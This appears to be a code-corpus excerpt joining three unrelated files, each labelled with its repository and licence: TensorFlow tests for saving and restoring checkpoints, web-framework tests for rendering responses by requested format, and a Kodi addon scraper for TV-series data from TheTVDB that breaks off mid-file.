"""Tests for tensorflow.ops.io_ops.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import os.path import time import tensorflow.python.platform import tensorflow as tf import numpy as np from tensorflow.python.platform import gfile class SaverTest(tf.test.TestCase): def testBasics(self): save_path = os.path.join(self.get_temp_dir(), "basics") with self.test_session() as sess: # Build a graph with 2 parameter nodes, and Save and # Restore nodes for them. v0 = tf.Variable(10.0, name="v0") v1 = tf.Variable(20.0, name="v1") save = tf.train.Saver({"v0": v0, "v1": v1}, restore_sequentially=True) tf.initialize_all_variables().run() # Check that the parameter nodes have been initialized. self.assertEqual(10.0, v0.eval()) self.assertEqual(20.0, v1.eval()) # Save the initialized values in the file at "save_path" val = save.save(sess, save_path) self.assertTrue(isinstance(val, basestring)) self.assertEqual(save_path, val) # Start a second session. In that session the parameter nodes # have not been initialized either. with self.test_session() as sess: v0 = tf.Variable(-1.0, name="v0") v1 = tf.Variable(-1.0, name="v1") save = tf.train.Saver({"v0": v0, "v1": v1}) with self.assertRaisesWithPredicateMatch( tf.OpError, lambda e: "uninitialized value v0" in e.message): sess.run(v0) with self.assertRaisesWithPredicateMatch( tf.OpError, lambda e: "uninitialized value v1" in e.message): sess.run(v1) # Restore the saved values in the parameter nodes. save.restore(sess, save_path) # Check that the parameter nodes have been restored. self.assertEqual(10.0, v0.eval()) self.assertEqual(20.0, v1.eval()) # Build another graph with 2 nodes, initialized # differently, and a Restore node for them. with self.test_session() as sess: v0_2 = tf.Variable(1000.0, name="v0") v1_2 = tf.Variable(2000.0, name="v1") save2 = tf.train.Saver({"v0": v0_2, "v1": v1_2}) tf.initialize_all_variables().run() # Check that the parameter nodes have been initialized. self.assertEqual(1000.0, v0_2.eval()) self.assertEqual(2000.0, v1_2.eval()) # Restore the values saved earlier in the parameter nodes. save2.restore(sess, save_path) # Check that the parameter nodes have been restored. self.assertEqual(10.0, v0_2.eval()) self.assertEqual(20.0, v1_2.eval()) def testInt64(self): save_path = os.path.join(self.get_temp_dir(), "int64") with self.test_session() as sess: # Build a graph with 1 node, and save and restore for them. v = tf.Variable(np.int64(15), name="v") save = tf.train.Saver({"v": v}, restore_sequentially=True) tf.initialize_all_variables().run() # Save the initialized values in the file at "save_path" val = save.save(sess, save_path) self.assertTrue(isinstance(val, basestring)) self.assertEqual(save_path, val) with self.test_session() as sess: v = tf.Variable(np.int64(-1), name="v") save = tf.train.Saver({"v": v}) with self.assertRaisesWithPredicateMatch( tf.OpError, lambda e: "uninitialized value v" in e.message): sess.run(v) # Restore the saved values in the parameter nodes. save.restore(sess, save_path) # Check that the parameter nodes have been restored. self.assertEqual(np.int64(15), v.eval()) def testSomeErrors(self): with tf.Graph().as_default(): v0 = tf.Variable([10.0], name="v0") v1 = tf.Variable([20.0], name="v1") v2 = tf.Variable([20.0], name="v2") v2._set_save_slice_info(tf.Variable.SaveSliceInfo("v1", "")) # By default the name used for "v2" will be "v1" and raise an error. 
with self.assertRaisesRegexp(ValueError, "same name: v1"): tf.train.Saver([v0, v1, v2]) # The names are different and will work. tf.train.Saver({"vee1": v1, "other": [v2]}) def testBasicsWithListOfVariables(self): save_path = os.path.join(self.get_temp_dir(), "basics_with_list") with self.test_session(graph=tf.Graph()) as sess: # Build a graph with 2 parameter nodes, and Save and # Restore nodes for them. v0 = tf.Variable(10.0, name="v0") v1 = tf.Variable(20.0, name="v1") save = tf.train.Saver([v0, v1]) tf.initialize_all_variables().run() # Check that the parameter nodes have been initialized. self.assertEqual(10.0, v0.eval()) self.assertEqual(20.0, v1.eval()) # Save the initialized values in the file at "save_path" val = save.save(sess, save_path) self.assertTrue(isinstance(val, basestring)) self.assertEqual(save_path, val) # Start a second session. In that session the variables # have not been initialized either. with self.test_session(graph=tf.Graph()) as sess: v0 = tf.Variable(-1.0, name="v0") v1 = tf.Variable(-1.0, name="v1") save = tf.train.Saver([v0, v1]) with self.assertRaisesWithPredicateMatch( tf.OpError, lambda e: "uninitialized value v0" in e.message): sess.run(v0) with self.assertRaisesWithPredicateMatch( tf.OpError, lambda e: "uninitialized value v1" in e.message): sess.run(v1) # Restore the saved values in the parameter nodes. save.restore(sess, save_path) # Check that the parameter nodes have been restored. self.assertEqual(10.0, v0.eval()) self.assertEqual(20.0, v1.eval()) # Build another graph with 2 nodes, initialized # differently, and a Restore node for them. with self.test_session(graph=tf.Graph()) as sess: v0_2 = tf.Variable(1000.0, name="v0") v1_2 = tf.Variable(2000.0, name="v1") save2 = tf.train.Saver([v0_2, v1_2]) tf.initialize_all_variables().run() # Check that the parameter nodes have been initialized. self.assertEqual(1000.0, v0_2.eval()) self.assertEqual(2000.0, v1_2.eval()) # Restore the values saved earlier in the parameter nodes. save2.restore(sess, save_path) # Check that the parameter nodes have been restored. self.assertEqual(10.0, v0_2.eval()) self.assertEqual(20.0, v1_2.eval()) def _SaveAndLoad(self, var_name, var_value, other_value, save_path): with self.test_session() as sess: var = tf.Variable(var_value, name=var_name) save = tf.train.Saver({var_name: var}) var.initializer.run() val = save.save(sess, save_path) self.assertEqual(save_path, val) with self.test_session() as sess: var = tf.Variable(other_value, name=var_name) save = tf.train.Saver({var_name: var}) save.restore(sess, save_path) self.assertAllClose(var_value, var.eval()) def testCacheRereadsFile(self): save_path = os.path.join(self.get_temp_dir(), "cache_rereads") # Save and reload one Variable named "var0". self._SaveAndLoad("var0", 0.0, 1.0, save_path) # Save and reload one Variable named "var1" in the same file. # The cached readers should know to re-read the file. 
self._SaveAndLoad("var1", 1.1, 2.2, save_path) def testGPU(self): if not tf.test.IsBuiltWithCuda(): return save_path = os.path.join(self.get_temp_dir(), "gpu") with tf.Session("", graph=tf.Graph()) as sess: with sess.graph.device("/gpu:0"): v0_1 = tf.Variable(123.45) save = tf.train.Saver({"v0": v0_1}) tf.initialize_all_variables().run() save.save(sess, save_path) with tf.Session("", graph=tf.Graph()) as sess: with sess.graph.device("/gpu:0"): v0_2 = tf.Variable(543.21) save = tf.train.Saver({"v0": v0_2}) tf.initialize_all_variables().run() self.assertAllClose(543.21, v0_2.eval()) save.restore(sess, save_path) self.assertAllClose(123.45, v0_2.eval()) def testVariables(self): save_path = os.path.join(self.get_temp_dir(), "variables") with tf.Session("", graph=tf.Graph()) as sess: one = tf.Variable(1.0) twos = tf.Variable([2.0, 2.0, 2.0]) init = tf.initialize_all_variables() save = tf.train.Saver(tf.all_variables()) init.run() save.save(sess, save_path) with tf.Session("", graph=tf.Graph()) as sess: one = tf.Variable(0.0) twos = tf.Variable([0.0, 0.0, 0.0]) # Saver with no arg, defaults to 'all variables'. save = tf.train.Saver() save.restore(sess, save_path) self.assertAllClose(1.0, one.eval()) self.assertAllClose([2.0, 2.0, 2.0], twos.eval()) def testSaveWithGlobalStep(self): save_path = os.path.join(self.get_temp_dir(), "ckpt_with_global_step") global_step_int = 5 # Save and reload one Variable named "var0". self._SaveAndLoad("var0", 0.0, 1.0, save_path) for use_tensor in [True, False]: with self.test_session() as sess: var = tf.Variable(1.0, name="var0") save = tf.train.Saver({var.op.name: var}) var.initializer.run() if use_tensor: global_step = tf.constant(global_step_int) val = save.save(sess, save_path, global_step=global_step) else: val = save.save(sess, save_path, global_step=global_step_int) expected_save_path = "%s-%d" % (save_path, global_step_int) self.assertEqual(expected_save_path, val) class SaveRestoreShardedTest(tf.test.TestCase): def testBasics(self): save_path = os.path.join(self.get_temp_dir(), "sharded") # Build a graph with 2 parameter nodes on different devices. with tf.Session( target="", config=tf.ConfigProto(device_count={"CPU": 2})) as sess: with sess.graph.device("/cpu:0"): v0 = tf.Variable(10, name="v0") with sess.graph.device("/cpu:1"): v1 = tf.Variable(20, name="v1") save = tf.train.Saver({"v0": v0, "v1": v1}, sharded=True) tf.initialize_all_variables().run() val = save.save(sess, save_path) self.assertEqual(save_path + "-?????-of-00002", val) # Restore a different "v0" from shard 0 of the saved files. with tf.Session( target="", config=tf.ConfigProto(device_count={"CPU": 2})) as sess: with sess.graph.device("/cpu:0"): v0 = tf.Variable(111, name="v0") save = tf.train.Saver({"v0": v0}, sharded=True) tf.initialize_all_variables().run() self.assertEqual(111, v0.eval()) save.restore(sess, save_path + "-00000-of-00002") self.assertEqual(10, v0.eval()) # Restore a different "v1" from shard 1 of the saved files. with tf.Session( target="", config=tf.ConfigProto(device_count={"CPU": 2})) as sess: with sess.graph.device("/cpu:0"): v1 = tf.Variable(222) save = tf.train.Saver({"v1": v1}, sharded=True) tf.initialize_all_variables().run() self.assertEqual(222, v1.eval()) save.restore(sess, save_path + "-00001-of-00002") self.assertEqual(20, v1.eval()) # Now try a restore with the sharded filename. 
with tf.Session( target="", config=tf.ConfigProto(device_count={"CPU": 2})) as sess: with sess.graph.device("/cpu:0"): v0 = tf.Variable(111, name="v0") with sess.graph.device("/cpu:1"): v1 = tf.Variable(222, name="v1") save = tf.train.Saver({"v0": v0, "v1": v1}, sharded=True) tf.initialize_all_variables().run() self.assertEqual(111, v0.eval()) self.assertEqual(222, v1.eval()) save_path = os.path.join(self.get_temp_dir(), "sharded") save.restore(sess, save_path + "-?????-of-?????") self.assertEqual(10, v0.eval()) self.assertEqual(20, v1.eval()) def testSaverDef(self): with self.test_session(): v0 = tf.Variable(123, name="v0") save = tf.train.Saver({"v0": v0}, sharded=True) sd = save.as_saver_def() self.assertTrue(sd.sharded) class MaxToKeepTest(tf.test.TestCase): def testNonSharded(self): save_dir = os.path.join(self.get_temp_dir(), "max_to_keep_non_sharded") try: gfile.DeleteRecursively(save_dir) except gfile.GOSError as _: pass # Ignore gfile.MakeDirs(save_dir) with self.test_session() as sess: v = tf.Variable(10.0, name="v") save = tf.train.Saver({"v": v}, max_to_keep=2) tf.initialize_all_variables().run() self.assertEqual([], save.last_checkpoints) s1 = save.save(sess, os.path.join(save_dir, "s1")) self.assertEqual([s1], save.last_checkpoints) self.assertTrue(gfile.Exists(s1)) s2 = save.save(sess, os.path.join(save_dir, "s2")) self.assertEqual([s1, s2], save.last_checkpoints) self.assertTrue(gfile.Exists(s1)) self.assertTrue(gfile.Exists(s2)) s3 = save.save(sess, os.path.join(save_dir, "s3")) self.assertEqual([s2, s3], save.last_checkpoints) self.assertFalse(gfile.Exists(s1)) self.assertTrue(gfile.Exists(s2)) self.assertTrue(gfile.Exists(s3)) # Create a second helper, identical to the first. save2 = tf.train.Saver(saver_def=save.as_saver_def()) save2.set_last_checkpoints(save.last_checkpoints) # Create a third helper, with the same configuration but no knowledge of # previous checkpoints. save3 = tf.train.Saver(saver_def=save.as_saver_def()) # Exercise the first helper. # Adding s2 again (old s2 is removed first, then new s2 appended) s2 = save.save(sess, os.path.join(save_dir, "s2")) self.assertEqual([s3, s2], save.last_checkpoints) self.assertFalse(gfile.Exists(s1)) self.assertTrue(gfile.Exists(s3)) self.assertTrue(gfile.Exists(s2)) # Adding s1 (s3 should now be deleted as oldest in list) s1 = save.save(sess, os.path.join(save_dir, "s1")) self.assertEqual([s2, s1], save.last_checkpoints) self.assertFalse(gfile.Exists(s3)) self.assertTrue(gfile.Exists(s2)) self.assertTrue(gfile.Exists(s1)) # Exercise the second helper. # Adding s2 again (old s2 is removed first, then new s2 appended) s2 = save2.save(sess, os.path.join(save_dir, "s2")) self.assertEqual([s3, s2], save2.last_checkpoints) # Created by the first helper. self.assertTrue(gfile.Exists(s1)) # Deleted by the first helper. self.assertFalse(gfile.Exists(s3)) self.assertTrue(gfile.Exists(s2)) # Adding s1 (s3 should now be deleted as oldest in list) s1 = save2.save(sess, os.path.join(save_dir, "s1")) self.assertEqual([s2, s1], save2.last_checkpoints) self.assertFalse(gfile.Exists(s3)) self.assertTrue(gfile.Exists(s2)) self.assertTrue(gfile.Exists(s1)) # Exercise the third helper. # Adding s2 again (but helper is unaware of previous s2) s2 = save3.save(sess, os.path.join(save_dir, "s2")) self.assertEqual([s2], save3.last_checkpoints) # Created by the first helper. self.assertTrue(gfile.Exists(s1)) # Deleted by the first helper. 
self.assertFalse(gfile.Exists(s3)) self.assertTrue(gfile.Exists(s2)) # Adding s1 (s3 should not be deleted because helper is unaware of it) s1 = save3.save(sess, os.path.join(save_dir, "s1")) self.assertEqual([s2, s1], save3.last_checkpoints) self.assertFalse(gfile.Exists(s3)) self.assertTrue(gfile.Exists(s2)) self.assertTrue(gfile.Exists(s1)) def testSharded(self): save_dir = os.path.join(self.get_temp_dir(), "max_to_keep_sharded") try: gfile.DeleteRecursively(save_dir) except gfile.GOSError as _: pass # Ignore gfile.MakeDirs(save_dir) with tf.Session( target="", config=tf.ConfigProto(device_count={"CPU": 2})) as sess: with sess.graph.device("/cpu:0"): v0 = tf.Variable(111, name="v0") with sess.graph.device("/cpu:1"): v1 = tf.Variable(222, name="v1") save = tf.train.Saver({"v0": v0, "v1": v1}, sharded=True, max_to_keep=2) tf.initialize_all_variables().run() self.assertEqual([], save.last_checkpoints) s1 = save.save(sess, os.path.join(save_dir, "s1")) self.assertEqual([s1], save.last_checkpoints) self.assertEquals(2, len(gfile.Glob(s1))) s2 = save.save(sess, os.path.join(save_dir, "s2")) self.assertEqual([s1, s2], save.last_checkpoints) self.assertEquals(2, len(gfile.Glob(s1))) self.assertEquals(2, len(gfile.Glob(s2))) s3 = save.save(sess, os.path.join(save_dir, "s3")) self.assertEqual([s2, s3], save.last_checkpoints) self.assertEquals(0, len(gfile.Glob(s1))) self.assertEquals(2, len(gfile.Glob(s2))) self.assertEquals(2, len(gfile.Glob(s3))) class KeepCheckpointEveryNHoursTest(tf.test.TestCase): def testNonSharded(self): save_dir = os.path.join(self.get_temp_dir(), "keep_checkpoint_every_n_hours") try: gfile.DeleteRecursively(save_dir) except gfile.GOSError as _: pass # Ignore gfile.MakeDirs(save_dir) with self.test_session() as sess: v = tf.Variable([10.0], name="v") # Run the initializer NOW to avoid the 0.5s overhead of the first Run() # call, which throws the test timing off in fastbuild mode. tf.initialize_all_variables().run() # Create a saver that will keep the last 2 checkpoints plus one every 0.7 # seconds. start_time = time.time() save = tf.train.Saver({"v": v}, max_to_keep=2, keep_checkpoint_every_n_hours=0.7 / 3600) self.assertEqual([], save.last_checkpoints) # Wait till 0.7 second have elapsed so s1 will be old enough to keep. time.sleep((time.time() + 0.7) - start_time) s1 = save.save(sess, os.path.join(save_dir, "s1")) self.assertEqual([s1], save.last_checkpoints) s2 = save.save(sess, os.path.join(save_dir, "s2")) self.assertEqual([s1, s2], save.last_checkpoints) # We now have 2 'last_checkpoints': [s1, s2]. The next call to Save(), # would normally delete s1, because max_to_keep is 2. However, s1 is # older than 0.7s so we must keep it. s3 = save.save(sess, os.path.join(save_dir, "s3")) self.assertEqual([s2, s3], save.last_checkpoints) # s1 should still be here, we are Not checking now to reduce time # variance in the test. # We now have 2 'last_checkpoints': [s2, s3], and s1 on disk. The next # call to Save(), will delete s2, because max_to_keep is 2, and because # we already kept the old s1. s2 is very close in time to s1 so it gets # deleted. s4 = save.save(sess, os.path.join(save_dir, "s4")) self.assertEqual([s3, s4], save.last_checkpoints) # Check that s1 is still here, but s2 is gone. 
self.assertTrue(gfile.Exists(s1)) self.assertFalse(gfile.Exists(s2)) self.assertTrue(gfile.Exists(s3)) self.assertTrue(gfile.Exists(s4)) class SaveRestoreWithVariableNameMap(tf.test.TestCase): def testNonReshape(self): save_path = os.path.join(self.get_temp_dir(), "basics") with self.test_session() as sess: # Build a graph with 2 parameter nodes, and Save and # Restore nodes for them. v0 = tf.Variable(10.0, name="v0") v1 = tf.Variable(20.0, name="v1") save = tf.train.Saver({"save_prefix/v0": v0, "save_prefix/v1": v1}) tf.initialize_all_variables().run() # Check that the parameter nodes have been initialized. self.assertEqual(10.0, v0.eval()) self.assertEqual(20.0, v1.eval()) # Save the initialized values in the file at "save_path" # Use a variable name map to set the saved tensor names val = save.save(sess, save_path) self.assertTrue(isinstance(val, basestring)) self.assertEqual(save_path, val) # Verify that the original names are not in the Saved file save = tf.train.Saver({"v0": v0, "v1": v1}) with self.assertRaisesOpError("not found in checkpoint"): save.restore(sess, save_path) # Verify that the mapped names are present in the Saved file and can be # Restored using remapped names. with self.test_session() as sess: v0 = tf.Variable(-1.0, name="v0") v1 = tf.Variable(-1.0, name="v1") with self.assertRaisesOpError("uninitialized value v0"): sess.run(v0) with self.assertRaisesOpError("uninitialized value v1"): sess.run(v1) save = tf.train.Saver({"save_prefix/v0": v0, "save_prefix/v1": v1}) save.restore(sess, save_path) # Check that the parameter nodes have been restored. self.assertEqual(10.0, v0.eval()) self.assertEqual(20.0, v1.eval()) # Add a prefix to the node names in the current graph and Restore using # remapped names. with self.test_session() as sess: v0 = tf.Variable(-1.0, name="restore_prefix/v0") v1 = tf.Variable(-1.0, name="restore_prefix/v1") with self.assertRaisesOpError("uninitialized value restore_prefix/v0"): sess.run(v0) with self.assertRaisesOpError("uninitialized value restore_prefix/v1"): sess.run(v1) # Restore the saved values in the parameter nodes. save = tf.train.Saver({"save_prefix/v0": v0, "save_prefix/v1": v1}) save.restore(sess, save_path) # Check that the parameter nodes have been restored. self.assertEqual(10.0, v0.eval()) self.assertEqual(20.0, v1.eval()) if __name__ == "__main__": tf.test.main()
brodyh/tensorflow
tensorflow/python/training/saver_test.py
Python
apache-2.0
21,676
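
The tests above exercise the legacy, pre-1.0 graph-mode tf.train.Saver API. For comparison, a minimal sketch (not part of the original tests) of the same save/restore round trip with the modern tf.train.Checkpoint API follows; the checkpoint prefix is an arbitrary placeholder.

# Sketch: eager-mode save/restore round trip with tf.train.Checkpoint.
import tensorflow as tf

v = tf.Variable(10.0)
ckpt = tf.train.Checkpoint(v=v)
path = ckpt.save("/tmp/saver_demo/ckpt")  # placeholder prefix

v.assign(-1.0)                            # clobber the value...
ckpt.restore(path)                        # ...then bring it back from disk
assert float(v.numpy()) == 10.0
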
import json
import re

from attest import Tests, assert_hook
from werkzeug.test import Client
from werkzeug.wrappers import Response

from plastic.app import BaseApp
from plastic.rendering import render


RenderingTestApp = BaseApp.clone()
RenderingTestApp.associate_mimetypes(html='text/html', xml='text/xml')


@RenderingTestApp.serializer('application/json')
def serialize_json(request, value):
    return json.dumps(value)


@RenderingTestApp.template_engine('t1')
def t1(request, path, values):
    with request.app.template_directory[path] as template:
        return template.read().format(request=request, **values)


@RenderingTestApp.route('/')
def home(request):
    return render(request, {'pi': 3.14}, 'home', pi=3.14)


tests = Tests()


@tests.test
def render_():
    client = Client(RenderingTestApp(), Response)
    response = client.get('/', headers=[('Accept', 'text/html')])
    assert response.data.strip() == '<h1>3.14</h1>'
    assert response.mimetype == 'text/html'
    assert 'Accept' in response.vary
    response = client.get('/', headers=[('Accept', 'text/xml')])
    assert response.data.strip() == '<pi value="3.14"/>'
    assert response.mimetype == 'text/xml'
    assert 'Accept' in response.vary
    response = client.get('/', headers=[('Accept', 'application/json')])
    assert json.loads(response.data)['pi'] == 3.14
    assert response.mimetype == 'application/json'
    assert 'Accept' in response.vary
    response = client.get('/', headers=[('Accept', 'text/plain')])
    assert response.status_code == 406
dahlia/plastic
plastictests/rendering.py
Python
mit
1,548
# -*- coding: utf-8 -*- # ------------------------------------------------------------ # tvdb # ------------------------------------------------------------ # Scraper para el site thetvdb.com usando API v2.1 # Utilizado para obtener datos de series para la videoteca # del addon y también Kodi. # ------------------------------------------------------------ import re import urllib2 from core import jsontools from core import scrapertools from core.item import InfoLabels from platformcode import config, logger from platformcode import platformtools HOST = "https://api.thetvdb.com" HOST_IMAGE = "http://thetvdb.com/banners/" TOKEN = config.get_setting("tvdb_token", default="") DEFAULT_LANG = "es" DEFAULT_HEADERS = { 'Content-Type': 'application/json', 'Accept': 'application/json, application/vnd.thetvdb.v2.1.1', 'Accept-Language': DEFAULT_LANG, 'Authorization': 'Bearer ' + TOKEN, } # Traducciones - Inicio DICT_STATUS = {'Continuing': 'En emisión', 'Ended': 'Finalizada'} DICT_GENRE = { 'Action': 'Acción', 'Adventure': 'Aventura', 'Animation': 'Animación', 'Children': 'Niños', 'Comedy': 'Comedia', 'Crime': 'Crimen', 'Documentary': 'Documental', # 'Drama': 'Drama', 'Family': 'Familiar', 'Fantasy': 'Fantasía', 'Food': 'Comida', 'Game Show': 'Concurso', 'Home and Garden': 'Hogar y Jardín', # 'Horror': 'Horror', 'Mini-Series': 'Mini-Series', 'Mystery': 'Misterio', 'News': 'Noticias', # 'Reality': 'Telerrealidad', 'Romance': 'Romántico', 'Science-Fiction': 'Ciencia-Ficción', 'Soap': 'Telenovela', # 'Special Interest': 'Special Interest', 'Sport': 'Deporte', # 'Suspense': 'Suspense', 'Talk Show': 'Programa de Entrevistas', # 'Thriller': 'Thriller', 'Travel': 'Viaje', # 'Western': 'Western' } DICT_MPAA = {'TV-Y': 'Público pre-infantil: niños menores de 6 años', 'TV-Y7': 'Público infantil: desde 7 años', 'TV-G': 'Público general: sin supervisión familiar', 'TV-PG': 'Guía paterna: Supervisión paternal', 'TV-14': 'Mayores de 14 años', 'TV-MA': 'Mayores de 17 años'} # Traducciones - Fin otvdb_global = None def find_and_set_infoLabels(item): logger.info() # logger.info("item es %s" % item) p_dialog = None if not item.contentSeason: p_dialog = platformtools.dialog_progress_bg("Buscando información de la serie", "Espere por favor...") global otvdb_global tvdb_result = None title = item.contentSerieName # Si el titulo incluye el (año) se lo quitamos year = scrapertools.find_single_match(title, "^.+?\s*(\(\d{4}\))$") if year: title = title.replace(year, "").strip() item.infoLabels['year'] = year[1:-1] if not item.infoLabels.get("tvdb_id"): if not item.infoLabels.get("imdb_id"): otvdb_global = Tvdb(search=title, year=item.infoLabels['year']) else: otvdb_global = Tvdb(imdb_id=item.infoLabels.get("imdb_id")) elif not otvdb_global or otvdb_global.get_id() != item.infoLabels['tvdb_id']: otvdb_global = Tvdb(tvdb_id=item.infoLabels['tvdb_id']) if not item.contentSeason: p_dialog.update(50, "Buscando información de la serie", "Obteniendo resultados...") results, info_load = otvdb_global.get_list_results() logger.debug("results es %s" % results) if not item.contentSeason: p_dialog.update(100, "Buscando información de la serie", "Encontrados %s posibles coincidencias" % len(results)) p_dialog.close() if len(results) > 1: tvdb_result = platformtools.show_video_info(results, item=item, scraper=Tvdb, caption="[%s]: Selecciona la serie correcta" % title) elif len(results) > 0: tvdb_result = results[0] # todo revisar if isinstance(item.infoLabels, InfoLabels): logger.debug("es instancia de infoLabels") infoLabels = 
item.infoLabels else: logger.debug("NO ES instancia de infoLabels") infoLabels = InfoLabels() if tvdb_result: infoLabels['tvdb_id'] = tvdb_result['id'] infoLabels['url_scraper'] = ["http://thetvdb.com/index.php?tab=series&id=%s" % infoLabels['tvdb_id']] if not info_load: if otvdb_global.get_id() != infoLabels['tvdb_id']: otvdb_global = Tvdb(tvdb_id=infoLabels['tvdb_id']) otvdb_global.get_images(infoLabels['tvdb_id'], image="poster") otvdb_global.get_images(infoLabels['tvdb_id'], image="fanart") otvdb_global.get_tvshow_cast(infoLabels['tvdb_id']) item.infoLabels = infoLabels set_infoLabels_item(item) return True else: item.infoLabels = infoLabels return False def set_infoLabels_item(item): """ Obtiene y fija (item.infoLabels) los datos extras de una serie, capitulo o pelicula. @param item: Objeto que representa un pelicula, serie o capitulo. El atributo infoLabels sera modificado incluyendo los datos extras localizados. @type item: Item """ global otvdb_global def __leer_datos(otvdb_aux): item.infoLabels = otvdb_aux.get_infoLabels(item.infoLabels) if 'infoLabels' in item and 'thumbnail' in item.infoLabels: item.thumbnail = item.infoLabels['thumbnail'] if 'infoLabels' in item and 'fanart' in item.infoLabels['fanart']: item.fanart = item.infoLabels['fanart'] if 'infoLabels' in item and 'season' in item.infoLabels: try: int_season = int(item.infoLabels['season']) except ValueError: logger.debug("El numero de temporada no es valido") item.contentType = item.infoLabels['mediatype'] return -1 * len(item.infoLabels) if not otvdb_global or \ (item.infoLabels['tvdb_id'] and otvdb_global.get_id() != item.infoLabels['tvdb_id']) \ or (otvdb_global.search_name and otvdb_global.search_name != item.infoLabels['tvshowtitle']): if item.infoLabels['tvdb_id']: otvdb_global = Tvdb(tvdb_id=item.infoLabels['tvdb_id']) else: otvdb_global = Tvdb(search=item.infoLabels['tvshowtitle']) __leer_datos(otvdb_global) if item.infoLabels['episode']: try: int_episode = int(item.infoLabels['episode']) except ValueError: logger.debug("El número de episodio (%s) no es valido" % repr(item.infoLabels['episode'])) item.contentType = item.infoLabels['mediatype'] return -1 * len(item.infoLabels) # Tenemos numero de temporada y numero de episodio validos... # ... 
buscar datos episodio item.infoLabels['mediatype'] = 'episode' lang = DEFAULT_LANG if otvdb_global.lang: lang = otvdb_global.lang page = 1 _id = None while not _id: list_episodes = otvdb_global.list_episodes.get(page) if not list_episodes: list_episodes = otvdb_global.get_list_episodes(otvdb_global.get_id(), page) import threading semaforo = threading.Semaphore(20) l_hilo = list() for e in list_episodes["data"]: t = threading.Thread(target=otvdb_global.get_episode_by_id, args=(e["id"], lang, semaforo)) t.start() l_hilo.append(t) # esperar q todos los hilos terminen for x in l_hilo: x.join() for e in list_episodes['data']: if e['airedSeason'] == int_season and e['airedEpisodeNumber'] == int_episode: _id = e['id'] break _next = list_episodes['links']['next'] if type(_next) == int: page = _next else: break data_episode = otvdb_global.get_info_episode(otvdb_global.get_id(), int_season, int_episode, lang, _id) # todo repasar valores que hay que insertar en infoLabels if data_episode: item.infoLabels['title'] = data_episode['episodeName'] # fix en casos que el campo desde la api era null--> None if data_episode["overview"] is not None: item.infoLabels['plot'] = data_episode["overview"] item.thumbnail = HOST_IMAGE + data_episode.get('filename', "") item.infoLabels["rating"] = data_episode.get("siteRating", "") item.infoLabels['director'] = ', '.join(sorted(data_episode.get('directors', []))) item.infoLabels['writer'] = ', '.join(sorted(data_episode.get("writers", []))) if data_episode["firstAired"]: item.infoLabels['premiered'] = data_episode["firstAired"].split("-")[2] + "/" + \ data_episode["firstAired"].split("-")[1] + "/" + \ data_episode["firstAired"].split("-")[0] item.infoLabels['aired'] = item.infoLabels['premiered'] guest_stars = data_episode.get("guestStars", []) l_castandrole = item.infoLabels.get("castandrole", []) l_castandrole.extend([(p, '') for p in guest_stars]) item.infoLabels['castandrole'] = l_castandrole # datos para nfo item.season_id = data_episode["airedSeasonID"] item.episode_id = data_episode["id"] return len(item.infoLabels) else: # Tenemos numero de temporada valido pero no numero de episodio... # ... buscar datos temporada item.infoLabels['mediatype'] = 'season' data_season = otvdb_global.get_images(otvdb_global.get_id(), "season", int_season) if data_season and 'image_season_%s' % int_season in data_season: item.thumbnail = HOST_IMAGE + data_season['image_season_%s' % int_season][0]['fileName'] return len(item.infoLabels) # Buscar... else: # Busquedas por ID... if (not otvdb_global or otvdb_global.get_id() != item.infoLabels['tvdb_id']) and item.infoLabels['tvdb_id']: otvdb_global = Tvdb(tvdb_id=item.infoLabels['tvdb_id']) elif not otvdb_global and item.infoLabels['imdb_id']: otvdb_global = Tvdb(imdb_id=item.infoLabels['imdb_id']) elif not otvdb_global and item.infoLabels['zap2it_id']: otvdb_global = Tvdb(zap2it_id=item.infoLabels['zap2it_id']) # No se ha podido buscar por ID... 
se hace por título if otvdb_global is None: otvdb_global = Tvdb(search=item.infoLabels['tvshowtitle']) if otvdb_global and otvdb_global.get_id(): __leer_datos(otvdb_global) # La busqueda ha encontrado un resultado valido return len(item.infoLabels) def get_nfo(item): """ Devuelve la información necesaria para que se scrapee el resultado en la videoteca de kodi, @param item: elemento que contiene los datos necesarios para generar la info @type item: Item @rtype: str @return: """ if "season" in item.infoLabels and "episode" in item.infoLabels: info_nfo = "http://thetvdb.com/?tab=episode&seriesid=%s&seasonid=%s&id=%s\n" \ % (item.infoLabels['tvdb_id'], item.season_id, item.episode_id) else: info_nfo = ', '.join(item.infoLabels['url_scraper']) + "\n" return info_nfo def completar_codigos(item): """ Si es necesario comprueba si existe el identificador de tmdb y sino existe trata de buscarlo @param item: tipo item @type item: Item """ if not item.infoLabels['tmdb_id']: listsources = [(item.infoLabels['tvdb_id'], "tvdb_id")] if item.infoLabels['imdb_id']: listsources.append((item.infoLabels['imdb_id'], "imdb_id")) from core.tmdb import Tmdb ob = Tmdb() for external_id, external_source in listsources: ob.search_by_id(id=external_id, source=external_source, tipo='tv') item.infoLabels['tmdb_id'] = ob.get_id() if item.infoLabels['tmdb_id']: url_scraper = "https://www.themoviedb.org/tv/%s" % item.infoLabels['tmdb_id'] item.infoLabels['url_scraper'].append(url_scraper) break class Tvdb: def __init__(self, **kwargs): self.__check_token() self.result = {} self.list_results = [] self.lang = "" self.search_name = kwargs['search'] = \ re.sub('\[\\\?(B|I|COLOR)\s?[^\]]*\]', '', kwargs.get('search', '')) self.list_episodes = {} self.episodes = {} if kwargs.get('tvdb_id', ''): # Busqueda por identificador tvdb self.__get_by_id(kwargs.get('tvdb_id', '')) if not self.list_results and config.get_setting("tvdb_retry_eng", "videolibrary"): from platformcode import platformtools platformtools.dialog_notification("No se ha encontrado en idioma '%s'" % DEFAULT_LANG, "Se busca en idioma 'en'", sound=False) self.__get_by_id(kwargs.get('tvdb_id', ''), "en") self.lang = "en" elif self.search_name: # Busqueda por texto self.__search(kwargs.get('search', ''), kwargs.get('imdb_id', ''), kwargs.get('zap2it_id', '')) if not self.list_results and config.get_setting("tvdb_retry_eng", "videolibrary"): from platformcode import platformtools platformtools.dialog_notification("No se ha encontrado en idioma '%s'" % DEFAULT_LANG, "Se busca en idioma 'en'") self.__search(kwargs.get('search', ''), kwargs.get('imdb_id', ''), kwargs.get('zap2it_id', ''), "en") self.lang = "en" if not self.result: # No hay resultados de la busqueda if kwargs.get('tvdb_id', ''): buscando = kwargs.get('tvdb_id', '') else: buscando = kwargs.get('search', '') msg = "La busqueda de %s no dio resultados." 
